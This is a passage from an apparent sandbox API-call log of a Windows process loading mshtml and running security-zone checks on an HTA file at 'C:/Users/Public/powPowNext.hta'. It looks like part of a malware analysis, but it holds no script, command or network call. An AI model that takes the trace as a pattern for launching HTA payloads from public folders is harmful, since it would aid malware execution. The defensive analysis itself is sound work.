(in: lpPerformanceCount=0x19f910 | out: lpPerformanceCount=0x19f910*=3095077481840) returned 1 [0131.956] _vsnwprintf (in: _Buffer=0x19f9a0, _BufferCount=0x4f, _Format="VSyncHelper-%p-%I64x", _ArgList=0x19f92c | out: _Buffer="VSyncHelper-006015F0-734cf5822") returned 30 [0131.956] RegisterClassW (lpWndClass=0x19f978) returned 0xc23e [0131.956] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc23e, lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x6015f0) returned 0x103bc [0131.957] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0131.957] NtdllDefWindowProc_W () returned 0x0 [0131.957] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0131.957] NtdllDefWindowProc_W () returned 0x1 [0131.958] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0131.958] NtdllDefWindowProc_W () returned 0x0 [0131.959] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0131.959] NtdllDefWindowProc_W () returned 0x0 [0131.959] SetWindowLongW (hWnd=0x103bc, nIndex=-21, dwNewLong=6297072) returned 0 [0131.960] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x308 [0131.960] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28, lpName=0x0) returned 0x30c [0131.960] MapViewOfFile (hFileMappingObject=0x30c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0x6990000 [0131.960] GetCurrentProcessId () returned 0xe14 [0131.960] GetCurrentThreadId () returned 0xb48 [0131.961] GetProcessHeap () returned 0x5e0000 [0131.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x90) returned 0x6135b0 [0131.961] GetSystemTimeAdjustment (in: lpTimeAdjustment=0x19f898, lpTimeIncrement=0x19f8ac, lpTimeAdjustmentDisabled=0x19f89c | out: lpTimeAdjustment=0x19f898, lpTimeIncrement=0x19f8ac, lpTimeAdjustmentDisabled=0x19f89c) returned 1 [0131.961] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310 [0131.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6dab7440, lpParameter=0x6135b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x314 [0131.962] RegisterPowerSettingNotification (hRecipient=0x103bc, PowerSettingGuid=0x6d75f000, Flags=0x0) returned 0x60bba8 [0131.964] GetProcessHeap () returned 0x5e0000 [0131.964] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x40) returned 0x60ac88 [0131.965] OpenProcess (dwDesiredAccess=0x100040, bInheritHandle=0, dwProcessId=0xe14) returned 0x324 [0131.965] OpenThread (dwDesiredAccess=0x100040, bInheritHandle=0, dwThreadId=0xb48) returned 0x328 [0131.965] GetProcessIdOfThread (Thread=0x328) returned 0xe14 [0131.965] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x19f8f4 | out: lpdwProcessId=0x19f8f4) returned 0xb48 [0131.965] GetCurrentProcess () returned 0xffffffff [0131.965] DuplicateHandle (in: hSourceProcessHandle=0x324, hSourceHandle=0x30c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f8f8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f8f8*=0x32c) returned 1 [0131.965] MapViewOfFile (hFileMappingObject=0x32c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0x6c20000 [0131.966] GetCurrentProcess () returned 0xffffffff [0131.966] DuplicateHandle (in: hSourceProcessHandle=0x324, hSourceHandle=0x308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x60acc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x60acc0*=0x330) returned 1 [0131.966] SetEvent (hEvent=0x310) returned 1 [0131.966] CloseHandle (hObject=0x32c) returned 1 [0131.966] CloseHandle (hObject=0x324) returned 1 [0131.966] SetEvent (hEvent=0x308) returned 1 [0131.967] SetWindowPos (hWnd=0x103ba, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0131.967] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.967] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x46, wParam=0x0, lParam=0x19fc0c*=66490, plResult=0x19fa68 | out: plResult=0x19fa68) returned 0x1 [0131.967] NtdllDefWindowProc_W () returned 0x0 [0131.967] GetCurrentThreadId () returned 0xb48 [0131.972] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.972] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x47, wParam=0x0, lParam=0x19fc0c*=66490, plResult=0x19fa64 | out: plResult=0x19fa64) returned 0x1 [0131.972] NtdllDefWindowProc_W () returned 0x0 [0131.972] GetCurrentThreadId () returned 0xb48 [0131.972] SetTimer (hWnd=0x103ba, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0131.973] GetFocus () returned 0x0 [0131.973] EnumChildWindows (hWndParent=0x103ba, lpEnumFunc=0x6e0775e0, lParam=0x19f9d7) returned 0 [0131.973] GetFocus () returned 0x0 [0131.973] SetFocus (hWnd=0x103ba) returned 0x0 [0131.973] NtdllDefWindowProc_W () returned 0x0 [0131.974] NtdllDefWindowProc_W () returned 0x0 [0132.002] NtdllDefWindowProc_W () returned 0x0 [0132.002] NtdllDefWindowProc_W () returned 0x0 [0132.002] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0132.003] NtdllDefWindowProc_W () returned 0x0 [0132.003] NtdllDefWindowProc_W () returned 0x1 [0132.005] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.020] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0132.020] LoadLibraryExA (lpLibFileName="OLEACC.DLL", hFile=0x0, dwFlags=0x0) returned 0x65d40000 [0132.052] GetProcAddress (hModule=0x65d40000, lpProcName="LresultFromObject") returned 0x65d56b20 [0132.053] LresultFromObject () returned 0xc095 [0132.285] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.289] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.441] GetCurrentThreadId () returned 0xb48 [0132.462] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.463] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.463] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.464] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.464] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.464] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.465] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.465] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.469] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.469] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0132.470] GetMessageTime () returned 0 [0132.470] GetMessagePos () returned 0x0 [0132.472] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x19f34c | out: plResult=0x19f34c) returned 0x0 [0132.511] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0132.511] GetMessageTime () returned 0 [0132.511] GetMessagePos () returned 0x0 [0132.511] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x19ec0c | out: plResult=0x19ec0c) returned 0x0 [0132.511] GetCurrentThreadId () returned 0xb48 [0132.512] GetCurrentThreadId () returned 0xb48 [0132.512] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0132.512] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103ba, phIMC=0x19f71c | out: phIMC=0x19f71c*=0x1e012b) returned 0x0 [0132.512] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f448 | out: lpPoint=0x19f448) returned 1 [0132.513] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f448 | out: lpPoint=0x19f448) returned 1 [0132.515] GetCapture () returned 0x0 [0132.515] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.518] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.518] memcpy_s (in: _Destination=0xcfa290, _DestinationSize=0x10, _Source=0x19ef28, _SourceSize=0x10 | out: _Destination=0xcfa290) returned 0x0 [0132.519] GetCurrentThreadId () returned 0xb48 [0132.519] GetCurrentThreadId () returned 0xb48 [0132.519] GetCurrentThreadId () returned 0xb48 [0132.519] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.519] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.519] GetCurrentThreadId () returned 0xb48 [0132.520] GetMessageTime () returned 0 [0132.520] GetMessagePos () returned 0x0 [0132.520] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x19f67c | out: plResult=0x19f67c) returned 0x1 [0132.520] NtdllDefWindowProc_W () returned 0x0 [0132.520] GetCurrentThreadId () returned 0xb48 [0132.523] LoadLibraryExW (lpLibFileName="mshtml.dll", hFile=0x0, dwFlags=0x0) returned 0x6d6d0000 [0132.523] LoadLibraryExW (lpLibFileName="mshtml.dll", hFile=0x0, dwFlags=0x60) returned 0x6d6d0000 [0132.524] LoadStringW (in: hInstance=0x6d6d0000, uID=0xb5, lpBuffer=0x19fb68, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0132.527] LoadStringW (in: hInstance=0x6d6d0000, uID=0xb5, lpBuffer=0x19fbd0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0132.528] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.528] LoadStringW (in: hInstance=0x6d6d0000, uID=0xb5, lpBuffer=0x19fba8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0132.528] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.528] GetCurrentThreadId () returned 0xb48 [0132.528] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.529] ShowWindow (hWnd=0x103ba, nCmdShow=1) returned 1 [0132.529] IUnknown:Release (This=0x5f2fa0) returned 0x1 [0132.529] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6270 | out: hHeap=0x5e0000) returned 1 [0132.529] GetMessageW (lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0132.529] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0132.529] SetEvent (hEvent=0x310) returned 1 [0132.534] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x3002b85, dwReserved=0x0, ppURI=0x19e548 | out: ppURI=0x19e548*=0x609dbc) returned 0x0 [0132.534] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19e524 | out: ppvObject=0x19e524*=0x609dbc) returned 0x0 [0132.534] IUnknown:Release (This=0x609dbc) returned 0x8 [0132.535] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0132.535] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4e) returned 0x615520 [0132.535] IUnknown:Release (This=0x609dbc) returned 0x8 [0132.535] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.535] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x63dea8 [0132.535] FindResourceExW (hModule=0x6d6d0000, lpType=0x6, lpName=0x1fe, wLanguage=0x0) returned 0x71d8a98 [0132.535] LoadResource (hModule=0x6d6d0000, hResInfo=0x71d8a98) returned 0x71ded10 [0132.535] LockResource (hResData=0x71ded10) returned 0x71ded10 [0132.535] VirtualQuery (in: lpAddress=0x71ded10, lpBuffer=0x19f6fc, dwLength=0x1c | out: lpBuffer=0x19f6fc*(BaseAddress=0x71de000, AllocationBase=0x6f40000, AllocationProtect=0x2, RegionSize=0x15d000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.536] SizeofResource (hModule=0x6d6d0000, hResInfo=0x71d8a98) returned 0x1be [0132.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x615520 | out: hHeap=0x5e0000) returned 1 [0132.536] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x63dea8, Size=0x6c) returned 0x63dea8 [0132.536] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63dd18 [0132.536] GetCurrentThreadId () returned 0xb48 [0132.536] SetEvent (hEvent=0x29c) returned 1 [0132.537] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.537] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.537] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.537] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f9d0, dwFlags=0x0 | out: pdwZone=0x19f9d0*=0xffffffff) returned 0x800c0011 [0132.537] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.537] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.537] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.537] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f9d4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19f9b4 | out: pPolicy=0x19f9d4*=0x0, pdwOutFlags=0x19f9b4*=0x0) returned 0x0 [0132.538] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f9d4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19f9d4*=0x0) returned 0x0 [0132.538] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.538] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.538] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.538] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19fa24 | out: ppu=0x19fa24) returned 0x0 [0132.538] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.539] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.539] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.539] memcpy_s (in: _Destination=0x606f1a, _DestinationSize=0x1ffe, _Source=0x19f6c0, _SourceSize=0x4 | out: _Destination=0x606f1a) returned 0x0 [0132.539] SetTimer (hWnd=0x103ba, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0132.540] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.540] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.540] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.540] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f5b8, dwFlags=0x0 | out: pdwZone=0x19f5b8*=0xffffffff) returned 0x800c0011 [0132.540] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.541] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.541] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.541] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x2106, pPolicy=0x19f5bc, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19f59c | out: pPolicy=0x19f5bc*=0x0, pdwOutFlags=0x19f59c*=0x0) returned 0x0 [0132.541] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x2106, pPolicy=0x19f5bc, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19f5bc*=0x0) returned 0x0 [0132.541] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.541] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.541] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.542] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.543] GetVersionExW (in: lpVersionInformation=0x19f598*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x40, dwMinorVersion=0x8c6f78, dwBuildNumber=0x19f5c4, dwPlatformId=0x6dbbf749, szCSDVersion="⡀\x8c@") | out: lpVersionInformation=0x19f598*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0132.543] GetKeyboardLayoutList (in: nBuff=32, lpList=0x19f6bc | out: lpList=0x19f6bc) returned 1 [0132.543] WTSGetActiveConsoleSessionId () returned 0x1 [0132.543] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc09f [0132.543] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0db [0132.543] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0de [0132.543] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc09a [0132.543] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc09b [0132.543] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc099 [0132.543] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc096 [0132.543] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0a4 [0132.543] RegisterClipboardFormatA (lpszFormat="image/svg+xml") returned 0xc127 [0132.543] RegisterClipboardFormatA (lpszFormat="msSourceUrl") returned 0xc128 [0132.543] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.544] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.544] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.544] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.544] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0132.545] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.545] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.545] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.545] IsCharSpaceW (wch=0x66) returned 0 [0132.545] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.545] IsCharSpaceW (wch=0x3a) returned 0 [0132.545] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x637918 [0132.545] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.545] IsCharSpaceW (wch=0x20) returned 1 [0132.545] IsCharSpaceW (wch=0x23) returned 0 [0132.545] IsCharAlphaNumericW (ch=0x23) returned 0 [0132.545] IsCharAlphaNumericW (ch=0x30) returned 1 [0132.546] IsCharAlphaNumericW (ch=0x0) returned 0 [0132.546] IsCharSpaceW (wch=0x30) returned 0 [0132.546] IsCharSpaceW (wch=0x23) returned 0 [0132.546] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x62b650 [0132.546] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.546] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2) returned 0x604cc8 [0132.546] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0132.546] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x637648 [0132.547] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.547] memcpy_s (in: _Destination=0x606f1c, _DestinationSize=0x1ffc, _Source=0x19f324, _SourceSize=0xc | out: _Destination=0x606f1c) returned 0x0 [0132.547] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.547] memcpy_s (in: _Destination=0x606f28, _DestinationSize=0x1ff0, _Source=0x616ac8, _SourceSize=0x8 | out: _Destination=0x606f28) returned 0x0 [0132.547] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618488 | out: hHeap=0x5e0000) returned 1 [0132.547] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.547] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0132.557] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.557] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.557] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.557] IsCharSpaceW (wch=0x66) returned 0 [0132.557] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.557] IsCharSpaceW (wch=0x3a) returned 0 [0132.557] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.557] IsCharSpaceW (wch=0x20) returned 1 [0132.557] IsCharSpaceW (wch=0x23) returned 0 [0132.558] IsCharAlphaNumericW (ch=0x23) returned 0 [0132.558] IsCharAlphaNumericW (ch=0x30) returned 1 [0132.558] IsCharAlphaNumericW (ch=0x0) returned 0 [0132.558] IsCharSpaceW (wch=0x30) returned 0 [0132.558] IsCharSpaceW (wch=0x23) returned 0 [0132.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x5f6270 [0132.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2) returned 0x604e48 [0132.558] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0132.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x637738 [0132.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.558] memcpy_s (in: _Destination=0x606f30, _DestinationSize=0x1fe8, _Source=0x19f324, _SourceSize=0x4 | out: _Destination=0x606f30) returned 0x0 [0132.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.559] memcpy_s (in: _Destination=0x606f34, _DestinationSize=0x1fe4, _Source=0x616b3c, _SourceSize=0x76e | out: _Destination=0x606f34) returned 0x0 [0132.559] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.559] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0132.559] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.559] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.559] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.559] IsCharSpaceW (wch=0x66) returned 0 [0132.559] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.559] IsCharSpaceW (wch=0x3a) returned 0 [0132.559] IsCharAlphaNumericW (ch=0x3a) returned 0 [0132.560] IsCharSpaceW (wch=0x20) returned 1 [0132.560] IsCharSpaceW (wch=0x23) returned 0 [0132.560] IsCharAlphaNumericW (ch=0x23) returned 0 [0132.560] IsCharAlphaNumericW (ch=0x0) returned 0 [0132.560] IsCharSpaceW (wch=0x66) returned 0 [0132.560] IsCharSpaceW (wch=0x23) returned 0 [0132.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63e8d0 [0132.560] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2) returned 0x604d28 [0132.560] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0132.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x637948 [0132.560] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.560] memcpy_s (in: _Destination=0x6076a2, _DestinationSize=0x1876, _Source=0x19f324, _SourceSize=0x4 | out: _Destination=0x6076a2) returned 0x0 [0132.560] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.560] memcpy_s (in: _Destination=0x6076a6, _DestinationSize=0x1872, _Source=0x617314, _SourceSize=0x82 | out: _Destination=0x6076a6) returned 0x0 [0132.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.561] StrChrW (lpStart="language", wMatch=0x3a) returned 0x0 [0132.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.561] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x62a970 [0132.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.562] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.562] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x63eb58 [0132.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618598 | out: hHeap=0x5e0000) returned 1 [0132.564] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x63eb58, Size=0xe2c) returned 0x63eb58 [0132.564] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe10) returned 0x63f990 [0132.564] memcpy_s (in: _Destination=0x607728, _DestinationSize=0x17f0, _Source=0x19f940, _SourceSize=0x8 | out: _Destination=0x607728) returned 0x0 [0132.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.565] RedrawWindow (hWnd=0x103ba, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0132.565] QueryPerformanceCounter (in: lpPerformanceCount=0x19f8a8 | out: lpPerformanceCount=0x19f8a8*=3095138390103) returned 1 [0132.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.566] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f984 | out: ppu=0x19f984) returned 0x0 [0132.566] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.566] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.566] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.566] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f930, dwFlags=0x0 | out: pdwZone=0x19f930*=0xffffffff) returned 0x800c0011 [0132.566] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.566] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.566] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.566] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f914 | out: pPolicy=0x19f934*=0x0, 